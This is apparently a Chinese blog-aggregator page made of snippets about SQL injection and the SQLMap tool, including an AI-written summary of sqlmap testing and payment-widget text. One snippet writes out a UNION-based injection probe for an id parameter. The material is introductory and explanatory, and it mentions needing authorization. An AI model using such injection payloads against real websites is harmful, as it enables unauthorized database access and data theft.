SQL注入是一种常见的Web应用程序安全漏洞,攻击者利用这种漏洞可以执行未经授权的SQL查询,甚至是对数据库的破坏性操作。通过本文,您学习了什么是SQL注入及其危害,以及如何使用SQLMap工具来检测和测试Web应用程序中的SQL注入漏洞SQLMap是一个自动化的SQL注入工具,用于检测和利用Web应用程序中的SQL注入漏洞。它支持多种数据库后端,并提供了强大的测试和利用功能。假设我们有一个简单的Web应用程序,该应用程序使用MySQL数据库,并且存在一个可能受到SQL注入攻击的搜索功能
BT5使用SQLMAP***演示
weixin_34220623的博客
02-21 301
BT5使用SQLMAP***演示2012-08-28 10:06:49 来源:colgator's blog简单介绍下sqlmap吧,它是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQLSQLMAP采用四种独...
SQL注入漏洞利用
Kali与编程
12-10 1509
渗透测试工程师可以检查Web应用程序中的输入字段,例如用户提交的表单、URL参数和Cookie等,以确定是否存在潜在的注入点。作为渗透测试工程师,了解SQL注入漏洞的利用是非常重要的,因为它可以帮助您发现并利用目标Web应用程序中的漏洞SQL注入攻击的原理是利用了Web应用程序中的输入验证不充分,允许恶意用户将恶意代码注入SQL查询中的漏洞。如果我们将id参数设置为’ union select 1,2,3–,应用程序可能会返回一个包含3个列的结果集,其中第一列的值为1,第二列的值为2,第三列的值为3。
【web安全】SQL注入漏洞3--sqlmap工具教程
一个程序员
01-16 1740
这篇文章,我们学习了sqlmap工具使用思路。了解了这些基本的使用方法,后续就知道我们怎么自动化进行sql注入漏洞了。当然,sqlmap的各种高级用法还有很多,本文没有全面讲解所有的命令, 我们在学习或者实战的过程中, 只要有一个明确的思路,然后需要到什么知识点,网上搜索查询并慢慢积累便可。后续会在演练或者实战过程中不断提升自身能力。
SQLMap——SQL 注入漏洞检测的神器
2301_77160226的博客
08-10 447
在网络安全领域,SQL 注入漏洞是一种常见且危害严重的安全隐患。SQLMap 作为一款专门用于检测和利用 SQL 注入漏洞的开源工具,为安全测试人员提供了强大的助力。
sqlmap实战挖sql注入漏洞
08-17
SQL注入是一种常见的网络安全漏洞,攻击者通过注入恶意的SQL代码来获取数据库中的数据或者执行非法操作。引用中提到了一个名为sqlmap工具,它是用来识别和利用SQL注入漏洞的。请意,为了遵守法律规定,我们不鼓励或支持在他人的网站上进行恶意攻击或破坏行为。 在进行sqlmap实战之前,首先需要确认目标网站是否存在SQL注入漏洞。可以通过访问网页并尝试使用一些特殊字符或语法进行测试。引用中的示例展示了如何使用id=参数进行测试,如果返回的结果与预期不符,说明该页面可能存在注入漏洞。 一旦确认目标网站存在注入漏洞,可以使用sqlmap来进行实际的注入测试。sqlmap是一个功能强大的工具,可以自动检测和利用SQL注入漏洞。它提供了多种选项和参数,可以根据需要进行定制化设置。具体的使用教程可以参考引用所提供的详细笔记。 需要强调的是,只有在授权的情况下,才能使用sqlmap工具进行漏洞测试。同时,建议在测试时使用自己的虚拟机环境,避免对他人网站造成不必要的损害。最重要的是,及时修复和加固自己的网站,以减少SQL注入漏洞的风险。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [sqlmap 进行sql漏洞注入](https://blog.youkuaiyun.com/qq_42876636/article/details/87691842)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记](https://download.youkuaiyun.com/download/qq_34953582/87973686)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值